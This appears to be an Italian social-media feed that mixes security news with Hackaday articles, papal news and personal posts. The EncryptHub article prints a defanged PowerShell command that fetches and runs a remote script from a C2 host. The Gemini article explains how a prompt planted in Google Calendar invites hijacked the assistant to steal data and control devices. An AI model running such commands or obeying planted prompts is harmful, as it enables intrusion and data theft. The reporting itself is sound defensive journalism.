Il team di ricerca di Trustwave SpiderLabs ha identificato una nuova ondata di attacchi EncryptHub che combinano l’errore umano e lo sfruttamento di una vulnerabilità nella Microsoft Management Console. Gli operatori si spacciano per personale di supporto, contattano il personale tramite Microsoft Teams e poi convincono il “cliente” ad aprire l’accesso remoto ed eseguire una serie di comandi, per poi distribuire il payload del bug CVE-2025-26633, nota come MSC EvilTwin.

Parallelamente, il gruppo utilizza canali di distribuzione non standard, tra cui la piattaforma di supporto Brave, il che complica il filtraggio del traffico e l’analisi degli incidenti. I report riportano anche altri nomi dello stesso team: LARVA-208 e Water Gamayun; in precedenza, il gruppo era stato associato ad attacchi contro sviluppatori Web3 e abusi della piattaforma Steam e, a febbraio, erano 618 le organizzazioni compromesse in tutto il mondo.

Il primo passo è l’ingegneria sociale . La vittima riceve una richiesta Teams da un “addetto IT”, dopodiché l’interlocutore offre insistentemente di avviare una sessione remota e “controllare le impostazioni“. Una volta stabilita la sessione, sulla macchina viene eseguita una riga come questa:

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command “Invoke-RestMethod -Uri ‘hxxps://cjhsbam[.]com/payload/runner.ps1’ | Invoke-Expression”

Questa chiamata scarica ed esegue lo script runner.ps1, che prepara un trampolino di lancio per sfruttare la vulnerabilità MMC.

Poi arriva il trucco con i file .msc doppi. Il loader crea due file di console con lo stesso nome: una copia “pulita” viene posizionata nella directory prevista e una copia dannosa viene posizionata nel percorso MUIPath, solitamente la directory en-US. Quando viene avviato lo snap-in legittimo, viene visualizzato il processo mmc.exe e, a causa del bug MSC EvilTwin, cerca prima il file con lo stesso nome in MUIPath. Di conseguenza, il sistema rileva il “mirror” da en-US ed esegue il codice degli aggressori. Sebbene la falla sia stata pubblicamente descritta come zero-day nel marzo 2025, campioni di tali file sono stati riscontrati in attacchi attivi già a febbraio; esiste una patch, ma la ricezione funziona ancora sulle stazioni non patchate.

Dopo aver disposto i doppi, runner.ps1 modifica il contenuto dello snap-in dannoso: il segnaposto htmlLoaderUrl viene sostituito con l’indirizzo del nodo di comando e controllo di EncryptHub, una stringa del tipo hxxps://cjhsbam[.]com/payload/build[.]ps1. Dopo aver ricevuto il collegamento, .msc esegue la fase successiva.

Lo script build.ps1 raccoglie i “finger” di sistema e li invia a C2, registra il meccanismo di esecuzione automatica, gestisce il canale di comunicazione e attende l’esecuzione dell’attività. I comandi vengono ricevuti in forma crittografata (AES), decrittografati localmente ed eseguiti direttamente sul nodo tramite Invoke-Expression. Tra i moduli tipici c’è linfostealer PowerShell Fickle Stealer, che estrae file sensibili, informazioni sull’ambiente e dati del portafoglio crittografico.

Durante l’indagine, sono emersi ulteriori strumenti Go, con i quali gli operatori stanno gradualmente sostituendo gli script di PowerShell. Uno di questi, SilentCrystal, replica la logica del bootloader, ma è compresso in un binario nativo. Innanzitutto, viene creata una cartella di pseudo-sistema “C:WindowsSystem32” con uno spazio dopo la parola Windows, che copia visivamente la directory reale e confonde gli strumenti di sicurezza. Quindi, il campione invia un POST al server di controllo con una “chiave API” hard-coded e un nome file casuale con estensione .zip; in risposta, viene inviato un collegamento legittimo al supporto Brave.

Ai principianti non è consentito caricare allegati su questo sito, il che significa che EncryptHub ha un account con diritti di caricamento. L’archivio dal supporto Brave viene scaricato e decompresso, dopodiché il segnaposto {URI} in WF.msc viene sostituito con l’indirizzo del centro di comando. Successivamente, viene avviato lo standard .msc e, grazie a CVE-2025-26633 , la console rileva la sostituzione dalla directory “false”, eseguendo il codice richiesto.

Un’altra scoperta interessante è un “proxy bookmark” in Go con supporto SOCKS5. Senza parametri, si avvia come client, si connette all'”hosting” degli aggressori utilizzando i dettagli hardcoded nel binario e devia il traffico in un tunnel. Esiste anche una modalità server: viene caricato un file con i dati di autenticazione, viene generato automaticamente un certificato TLS autofirmato (il campo Common Name contiene la riga Reverse Socks e il nome DNS è localhost), dopodiché il processo inizia ad accettare più connessioni, parallelizzando l’elaborazione tramite goroutine. Quando viene stabilita una connessione, l’agente accede a Telegram con lo stato “start”, dove sostituisce il nome utente, il dominio dalla variabile d’ambiente USERDOMAIN, il risultato della verifica dei diritti amministrativi tramite una chiamata di sessione di rete, nonché l’IP pubblico, il geotag e il provider su richiesta a ipinfo.io/json . L’analisi dell’infrastruttura ha mostrato richieste di payload su hxxps://safesurf.fastdomain-uoemathhvq.workers.dev/payload/pay[.]ps1, un altro tassello nel quadro di C2.

L'articolo Hai risposto su Teams al supporto IT? Complimenti! Il Trojan è nel PC con diritti superiori ai tuoi proviene da il blog della sicurezza informatica.

reshared this



FLUG - Migrazione server di posta


firenze.linux.it/2025/08/migra…
Segnalato da Linux Italia e pubblicato sulla comunità Lemmy @GNU/Linux Italia
Lunedì 28 luglio 2025 sulla lista del FLUG è stata annunciata la migrazione al nuovo server di posta sul rinato serverino (nome in codice Coraggio). Stiamo ancora verificando che tutto



“Affidiamo all’intercessione della Vergine Maria, assunta in cielo, la nostra preghiera per la pace”. Lo ha detto oggi Papa Leone XIV dopo la recita dell’Angelus a Castel Gandolfo: “Ella, come Madre, soffre per i mali che affliggono i suoi figli, spe…


“Cari fratelli e sorelle, buona festa!”. Nel giorno della Solennità dell’Assunzione della Beata Vergine Maria, recitando l’Angelus a Castel Gandolfo, Papa Leone XIV ha ricordato le parole del Concilio Vaticano II, secondo cui Maria “brilla ora innanz…


Google corregge un bug critico in Gemini che permette di tracciare gli utenti


Gli sviluppatori di Google hanno corretto un bug che consentiva agli inviti dannosi di Google Calendar di prendere il controllo remoto degli agenti Gemini in esecuzione sul dispositivo della vittima e di rubare i dati dell’utente. Gemini è il Large Language Model (LLM) di Google integrato nelle app Android.

I ricercatori di SafeBreach hanno scoperto che inviando alla vittima un invito con un prompt di Google Calendar incorporato (che poteva essere nascosto, ad esempio, nel titolo dell’evento), gli aggressori erano in grado di estrarre il contenuto dell’email e le informazioni del calendario, tracciare la posizione dell’utente, controllare i dispositivi della smart home tramite Google Home, aprire app Android e avviare videochiamate Zoom.

Nel loro rapporto, gli esperti sottolineano che un attacco di questo tipo non richiedeva l’accesso a un modello white-box e non veniva bloccato dai filtri rapidi e da altri meccanismi di difesa Gemini.

L’attacco inizia inviando alla vittima un invito a un evento tramite Google Calendar, il cui titolo contiene un messaggio dannoso. Una volta che la vittima interagisce con Gemini, ad esempio chiedendo “Quali eventi sono programmati sul mio calendario oggi?”, l’IA scaricava un elenco di eventi da Calendar, incluso quello dannoso.

Di conseguenza, il prompt dannoso è diventato parte della finestra di contesto di Gemini e l’assistente lo ha percepito come parte della conversazione, senza rendersi conto che l’istruzione era ostile all’utente.

A seconda del prompt utilizzato, gli aggressori potrebbero avviare vari strumenti o agenti per eliminare o modificare gli eventi del Calendario, aprire URL per determinare l’indirizzo IP della vittima, partecipare alle chiamate Zoom, utilizzare Google Home per controllare i dispositivi e accedere alle e-mail ed estrarre dati.

I ricercatori hanno osservato che un aggressore potrebbe inviare sei inviti, includendo il prompt dannoso solo nell’ultimo, per garantire che l’attacco funzioni mantenendo comunque un certo livello di furtività.

Il problema è che Calendar Events mostra solo gli ultimi cinque eventi, mentre gli altri sono nascosti sotto il pulsante “Mostra altro“. Tuttavia, quando richiesto, Gemini li analizza tutti, incluso quello dannoso. Allo stesso tempo, l’utente non vedrà il nome dannoso a meno che non espanda manualmente l’elenco degli eventi.

Google ha risposto al rapporto SafeBreach affermando che l’azienda sta continuamente implementando nuove difese per Gemini per contrastare un’ampia gamma di attacchi, e che molte delle misure sono pianificate per un’implementazione imminente o sono già in fase di implementazione.

L'articolo Google corregge un bug critico in Gemini che permette di tracciare gli utenti proviene da il blog della sicurezza informatica.



La gioia e la frustrazione di non essere più su Facebook


A metà di Giugno ho informato tutti i miei amici di Facebook che avrei chiuso l'account. Gli ho anche detto che mi avrebbero trovato qui su Friendica, ma fino ad oggi purtroppo non vedo nessuno, a parte @Fabrizio Venerandi che è molto più avanti di me (e di tanti altri) in queste cose.
Io non desisto, anche rinfrancato dal fatto che l'affidabilità di Meta è sempre più in declino.
Mia moglie aveva disattivato il suo account Facebook anni fa e da qualche settimana aveva notato riapparire notifiche via mail. Chiaramente il suo account era stato hackerato.
Per settimane abbiamo provato a riprenderne il controllo e solo oggi ci siamo riusciti. Ore e ore perse dietro questi incompetenti.
In pratica mia moglie ogni 5 giorni, oltre alle usuali notifiche, riceveva un messaggio con un codice numerico per recuperare la password. Questo probabilmente era l'hacker che le impediva in questo modo di attivare la funzione di recupero della password. Infatti quando andava per attivarla, le diceva "Sembra che tu stia usando in modo errato questa funzione andando troppo velocemente. Ti è stato temporaneamente impedito di usarla.". Ma la cosa assurda è che esiste anche un link di Facebook per segnalare che il proprio account è stato hackerato ed utilizzandolo si riceveva la stessa risposta "Sembra che tu stia usando in modo errato questa funzione...", il che è completamente assurdo perché è proprio quello che gli hacker desiderano per impedire che qualcuno possa recuperare il proprio account!
Il tentativo che finalmente è andato in porto è stato quello di cercare di creare un account con la stessa e-mail e nome e a quel punto la funzione di recupero della password con l'invio di un codice si è attivata.
Ora il problema sarà riuscire ad entrare (per capire cosa ha fatto l'hacker) senza inchinarsi a 1) pagare dei soldi per non avere la pubblicità o 2) accettare che i propri dati personali vengano usati per pubblicità personalizzata. Ci siamo quasi e poi anche questo account verrà eliminato!


la questione balneari può essere vista e descritta in molti modi diversi e pure contrapposti. ma quando è l'evidenza dei fatti ci dice che è gestita come una "rendita", dalla quale si cerca ogni anno di spremere sempre di più, e non un'attività economica, legata al territorio e all'economia locale, che non tiene conto del potere di acquisto degli italiani costantemente in decrescita, quando più, quanto meno, diventa comprensibile come diventi un non senso economico. tanto varrebbe annullare tutte le concessioni e trasformare tutto in spiagge libere con servizi extra a pagamento, cosa che peraltro, almeno in teoria, già sarebbero. un governo coraggioso potrebbe sollo fare questo come atto sensato. come minimo andrebbe dichiarato illegale far pagare l'ingresso i controllare gli accessi. è proprio l'attuale modello di business è che è fuori dal tempo, come quasi tutto in italia.


Teletext Around the World, Still


When you mention Teletext or Videotex, you probably think of the 1970s British system, the well-known system in France, or the short-lived US attempt to launch the service. Before the Internet, there were all kinds of crazy ways to deliver customized information into people’s homes. Old-fashioned? Turns out Teletext is alive and well in many parts of the world, and [text-mode] has the story of both the past and the present with a global perspective.

The whole thing grew out of the desire to send closed caption text. In 1971, Philips developed a way to do that by using the vertical blanking interval that isn’t visible on a TV. Of course, there needed to be a standard, and since standards are such a good thing, the UK developed three different ones.

The TVs of the time weren’t exactly the high-resolution devices we think of these days, so the 1976 level one allowed for regular (but Latin) characters and an alternate set of blocky graphics you could show on an expansive 40×24 palette in glorious color as long as you think seven colors is glorious. Level 1.5 added characters the rest of the world might want, and this so-called “World System Teletext” is still the basis of many systems today. It was better, but still couldn’t handle the 134 characters in Vietnamese.

Meanwhile, the French also wanted in on the action and developed Antiope, which had more capabilities. The United States would, at least partially, adopt this standard as well. In fact, the US fragmented between both systems along with a third system out of Canada until they converged on AT&T’s PLP system, renamed as North American Presentation Layer Syntax or NAPLPS. The post makes the case that NAPLPS was built on both the Canadian and French systems.

That was in 1986, and the Internet was getting ready to turn all of these developments, like $200 million Canadian system, into a roaring dumpster fire. The French even abandoned their homegrown system in favor of the World System Teletext. The post says as of 2024, at least 15 countries still maintain teletext.

So that was the West. What about behind the Iron Curtain, the Middle East, and in Asia? Well, that’s the last part of the post, and you should definitely check it out.
Japan’s version of teletex, still in use as of the mid-1990s, was one of the most advanced.
If you are interested in the underlying technology, teletext data lives in the vertical blanking interval between frames on an analog TV system. Data had page numbers. If you requested a page, the system would either retrieve it from a buffer or wait for it to appear in the video signal. Some systems send a page at a time, while others send bits of a page on each field. In theory, the three-digit page number can range from 100 to 0x8FF, although in practice, too many pages slow down the system, and normal users can’t key in hex numbers.

For PAL, for example, the data resides in even lines between 6 and 22, or in lines 318 to 335 for odd lines. Systems can elect to use fewer lines. A black signal is a zero, while a 66% white signal is a one, and the data is in NRZ line coding. There is a framing code to identify where the data starts. Other systems have slight variations, but the overall bit rate is around 5 to 6 Mbit/s. Character speeds are slightly slower due to error correction and other overhead.

Honestly, we thought this was all ancient history. You have to wonder which country will be the last one standing as the number of Teletext systems continues to dwindle. Of course, we still have closed captions, but with digital television, it really isn’t the same thing. Can Teletext run Doom? Apparently, yes, if you stretch your definition of success a bit.


hackaday.com/2025/08/15/telete…



“Quando in questa vita scegliamo la vita, allora in Maria, assunta in Cielo, abbiamo ragione di vedere il nostro destino. Lei ci è donata come il segno che la Risurrezione di Gesù non è stata un caso isolato, un’eccezione.


“Oggi non è domenica, ma in modo diverso abbiamo celebrato la Pasqua di Gesù che cambia la storia. In Maria di Nazaret c’è la nostra storia, la storia della Chiesa immersa nella comune umanità.


Umsetzung der NIS-2-Richtlinie: Bundestag muss Gesetz zur Cybersicherheit nachbessern


netzpolitik.org/2025/umsetzung…



È bastata una ん di troppo! Phishing che impersona Booking.com con la tecnica degli omoglifi


Gli aggressori hanno iniziato a utilizzare un trucco insolito per mascherare i link di phishing, facendoli apparire come indirizzi di Booking.com. La nuova campagna malware utilizza il carattere hiragana giapponese “ん” (U+3093). In alcuni font e interfacce, assomiglia visivamente a una barra, facendo apparire l’URL come un normale percorso sul sito, sebbene in realtà conduca a un dominio falso.

Il ricercatore JAMESWT ha scoperto che nelle e-mail di phishing il collegamento si presenta così:

admin.booking.com/hotel/hotela…

ma in realtà indirizza l’utente a un indirizzo del tipo

account.booking.comんdetail

Tutto ciò che precede “www-account-booking[.]com” è solo un sottodominio che imita la struttura del sito reale. Il vero dominio registrato appartiene agli aggressori. Cliccandoci sopra, la vittima finisce sulla pagina

www-account-booking[.]com/c.php?a=0

da cui viene scaricato un file MSI dannoso dal nodo CDN updatessoftware.b-cdn[.]net.

Secondo l’analisi di MalwareBazaar e ANY.RUN , il programma di installazione distribuisce componenti aggiuntivi, probabilmente infostealer o strumenti di accesso remoto.

La tecnica si basa sull’uso di omoglifi ovvero simboli che sembrano altri ma appartengono ad altri alfabeti o set Unicode. Tali simboli sono spesso utilizzati in attacchi omografi e phishing. Un esempio è la “O” cirillica (U+041E), che è quasi indistinguibile dalla “O” latina (U+004F). Nonostante gli sviluppatori di browser e servizi aggiungano protezioni contro tali sostituzioni, gli attacchi continuano a verificarsi.

Non è la prima volta che Booking.com diventa un’esca per il phishing. A marzo, Microsoft Threat Intelligence ha segnalato email mascherate da servizio di prenotazione che utilizzavano la tecnica ClickFix per infettare i computer dei dipendenti degli hotel. E ad aprile, i ricercatori di Malwarebytes hanno segnalato uno schema simile.

Tuttavia, l’uso di omoglifi come “ん” può ingannare anche gli utenti più attenti, quindi è importante integrare la cautela con un software antivirus aggiornato in grado di bloccare il download di contenuti dannosi.

L'articolo È bastata una ん di troppo! Phishing che impersona Booking.com con la tecnica degli omoglifi proviene da il blog della sicurezza informatica.


redhotcyber.com/post/e-bastata…

in reply to Cybersecurity & cyberwarfare

e in tutto questo la cosa che mi fa più strano è l'uso di Edge su Ubuntu

reshared this



la cosa assurda è che vedendo trump pare un soggetto talmente assurdo, pare talmente assurdo che possa esistere ed essere apprezzato, che vivo in una specie di limbo di insicurezza totale, in cui a loop mi chiedo se sono impazzita io, se ho una visione distorta del mondo, se mi sfugge una qualche qualità a cui sono ostinatamente cieca. trump è talmente un non senso che non riesco ad accettare che possa esistere senza che io stia dimenticando di considerare qualche ragione logica importante. un qualche problema reale che incredibilmente io non so come riesco a ignorare e che lui sta dimostrando di risolvere efficacemente che possa giustificare tutta questa follia sicuramente solo "apparente". vivo nell'idea che "qualcosa mi sfugga". non può essere così stupida la realtà.
in reply to simona

@informapirata @talksina in realtà sta facendo gli interessi delle big tech. Minaccia tariffe alte a qualsiasi stato voglia tassarle. L'unico a cui sta pestando i piedi è Melon, ma tanto ormai è diventato lo zimbello di tutti.

reshared this

in reply to simona

@informapirata @talksina
Ok, cerchiamo di essere seri.
Se si vuole capire di chi si sta facendo gli interessi e come basta leggere “Dall’economia dell’ occupazione all’economia del genocidio” della relatrice speciale sulla situazione dei diritti umani nei territori palestinesi occupati dal 1967.
È un esempio estremo?
È un esempio circoscritto?
No.
Svela interessi, meccanismi e intrecci che ci riguardano e non solo umanamente


Nuovo articolo su giardino-punk.it: Anarchismo e modernità politica
giardino-punk.it/anarchismo-e-…
L'anarchismo come politica posmoderna, partendo da un testo di Nathan Jun

Beatrice Sgaravatto reshared this.



trump sta riuscendo nel difficile compito di abbattere l'economia usa... proprio nel minarla alle radici.
in reply to simona

in realtà [!?ma davvero esiste una realtà oggettiva!?] trump-hio,(eggasi tronfio),e put-in,(leggasi in inglese)sono le due faccie della stessa medaglia,unica differenza la bandiera😑😁
in reply to simona

culturalmente rimangono abbastanza diversi. non ti lasciar perdere nel qualunquismo. putin è un uomo del kgb che ragiona in modo ottocentesco che pensa a conquista militari stile prima guerra mondiale. avanzate poderose. artiglieria. mezzi e uomini al macello. e pensa che questo serva a qualcosa. un "idoelogo" puro. di quelle ideologie che hanno a lungo avvelenato la storia. trump è il figlio di un uomo d'affari. che non sa fare affari. che non sa che un affare parte da un'idea innovativa. trump non ha idee. ma pensa che sia tutta una questione di soldi. sono molto diversi. a modo loro ugualmente dannosi ma certamente diversi. poi possiamo vedere trump come l'gente russo e putin con l'agente americano, ma sono tutte idee surreali più fantasie. l'unica cosa che hanno in comune è che entrambi stanno minando alla radice quello che amministrano. io vedo felicemernte distrutti entrambi gli imperi. ma peccato ci sia l'ucraina nel mezzo. ed in realtà non solo perché putin al confine russo schiavizza numerosi popoli e nazioni.


il bello è che quei coglioni dei repubblicani pensano di aver scelto un economista... attento ai temi economici... ricorda la storia in italia di berlusconi. che poi berlusconi per quanto antipatico è stato infinitamente meno dannoso di trump.


"Dan Carney del Lawrence Berkeley National Laboratory ha proposto un esperimento per cercare “tremolii” gravitazionali: un pendolo torsionale accanto a una nuvola di atomi in stato quantico potrebbe rivelare irregolarità dovute a effetti entropici. La gravità tradizionale produrrebbe variazioni regolari, mentre eventuali fluttuazioni casuali indicherebbero un’origine termodinamica."

informapirata ⁂ reshared this.




Buon #Ferragosto dal #MIM! ☀
Quali libri vi stanno accompagnando in questi mesi estivi?


Open Source Lithium-Titanate Battery Management System


Lithium-titanate (LTO) is an interesting battery chemistry that is akin to Li-ion but uses Li2TiO3 nanocrystals instead of carbon for the anode. This makes LTO cells capable of much faster charging and with better stability characteristics, albeit at the cost of lower energy density. Much like LiFePO4 cells, this makes them interesting for a range of applications where the highest possible energy density isn’t the biggest concern, while providing even more stability and long-term safety.

That said, LTO is uncommon enough that finding a battery management system (BMS) can be a bit of a pain. This is where [Vlastimil Slintak]’s open source LTO BMS project may come in handy, which targets single cell (1S) configurations with the typical LTO cell voltage of around 1.7 – 2.8V, with 3 cells in parallel (1S3P). This particular BMS was designed for low-power applications like Meshtastic nodes, as explained on the accompanying blog post which also covers the entire development and final design in detail.

The BMS design features all the stuff that you’d hope is on there, like under-voltage, over-voltage and over-current protection, with an ATtiny824 MCU providing the brains. Up to 1 A of discharge and charge current is supported, for about 2.4 Watt at average cell voltage. With the triple 1,300 mAh LTO cells in the demonstrated pack you’d have over 9 Wh of capacity, with the connected hardware able to query the BMS over I2C for a range of statistics.

Thanks to [Marcel] for the tip.


hackaday.com/2025/08/15/open-s…



Cobalt Strike per tutti con CrossC2! Prestiamo attenzione ai server Linux sprovvisti di EDR


Il Giappone è stato colpito da una nuova ondata di attacchi informatici che hanno utilizzato CrossC2, uno strumento per estendere le funzionalità di Cobalt Strike alle piattaforme Linux e macOS. Il centro di coordinamento JPCERT/CC ha riferito che gli attacchi hanno avuto luogo tra settembre e dicembre 2024 e hanno interessato diversi paesi, tra cui il Giappone.

L’analisi degli artefatti caricati su VirusTotal ha mostrato che gli aggressori hanno combinato CrossC2 con altri strumenti come PsExec, Plink e lo stesso Cobalt Strike per penetrare nell’infrastruttura di Active Directory. Cobalt Strike è stato caricato utilizzando un malware appositamente sviluppato chiamato ReadNimeLoader.

CrossC2 è una versione non ufficiale di Beacon e del suo builder che consente l’esecuzione di comandi Cobalt Strike su diversi sistemi operativi dopo aver stabilito una connessione a un server remoto specificato nella configurazione. Nei casi registrati, gli aggressori hanno creato un’attività pianificata sui computer infetti per eseguire un file eseguibile legittimo java.exe, utilizzato per il sideload di ReadNimeLoader nella libreria “jli.dll“.

ReadNimeLoader è scritto in Nim e carica il contenuto di un file di testo in memoria, evitando di scrivere dati su disco. Il codice caricato è OdinLdr, un loader di shellcode aperto che decodifica il Cobalt Strike Beacon incorporato e lo esegue in memoria. Il meccanismo include tecniche anti-debug e anti-analisi che impediscono la decodifica di OdinLdr finché l’ambiente non è completamente controllato.

JPCERT/CC ha rilevato somiglianze tra questa campagna e l’attività BlackSuit/Black Basta segnalata da Rapid7 nel giugno 2025. Sono state riscontrate somiglianze nel dominio C&C utilizzato e nei nomi dei file. Inoltre, sono state rilevate diverse versioni ELF della backdoor SystemBC, che spesso precede l’installazione di Cobalt Strike e la distribuzione di ransomware.

Gli esperti hanno prestato particolare attenzione al fatto che gli aggressori hanno compromesso attivamente i server Linux all’interno delle reti aziendali. Molti di questi sistemi non sono dotati di soluzioni EDR o strumenti di rilevamento simili, il che li rende un comodo punto di ingresso per ulteriori sviluppi dell’attacco. Ciò aumenta il rischio di penetrazione su larga scala e richiede un maggiore controllo su tali segmenti infrastrutturali.

L'articolo Cobalt Strike per tutti con CrossC2! Prestiamo attenzione ai server Linux sprovvisti di EDR proviene da il blog della sicurezza informatica.





Bug da Oscar (score 10) per Cisco Secure Firewall Management Center


Una falla di sicurezza critica è stata resa pubblica da Cisco nel suo software Secure Firewall Management Center (FMC), permettendo potenzialmente a malintenzionati non autenticati di eseguire, a distanza, comandi shell a loro scelta con alti livelli di autorizzazione. La vulnerabilità, identificata come CVE-2025-20265 e a cui è stato assegnato il punteggio CVSS massimo di 10,0, rappresenta una delle falle di sicurezza più gravi scoperte quest’anno nell’infrastruttura firewall di Cisco.

Gli aggressori possono sfruttare questa vulnerabilità inviando credenziali appositamente create durante il processo di autenticazione RADIUS consentendo loro di iniettare comandi shell dannosi che vengono successivamente eseguiti dal dispositivo di destinazione. Ciò che rende questa vulnerabilità particolarmente pericolosa è il fatto che non richiede alcuna autenticazione e può essere sfruttata da remoto tramite la rete.

La vulnerabilità di sicurezza risiede nell’implementazione del sottosistema RADIUS del software Secure FMC di Cisco e colpisce in particolare la fase di autenticazione, in cui l’input dell’utente viene gestito in modo improprio.

La vulnerabilità colpisce specificamente le versioni 7.0.7 e 7.7.0 del software Cisco Secure FMC, ma solo quando l’autenticazione RADIUS è abilitata per l’interfaccia di gestione basata sul web, per la gestione SSH o per entrambe. Le organizzazioni che non utilizzano l’autenticazione RADIUS non sono vulnerabili a questo specifico vettore di attacco.

La vulnerabilità deriva da una convalida insufficiente degli input durante il processo di verifica delle credenziali, creando un’opportunità per attacchi di iniezione di comandi quando il sistema elabora le richieste di autenticazione inviate al server RADIUS configurato.

Cisco
ha rilasciato aggiornamenti le patch che risolvono la vulnerabilità e consiglia vivamente di applicare immediatamente le patch a tutti i sistemi interessati.

L'articolo Bug da Oscar (score 10) per Cisco Secure Firewall Management Center proviene da il blog della sicurezza informatica.



Sto facendo colazione guardando la messa celebrata dal papa.

Leggono un brano dell'Apocalisse, un testo a cui noi amanti dell'horror e dell'heavy metal dobbiamo moltissimo.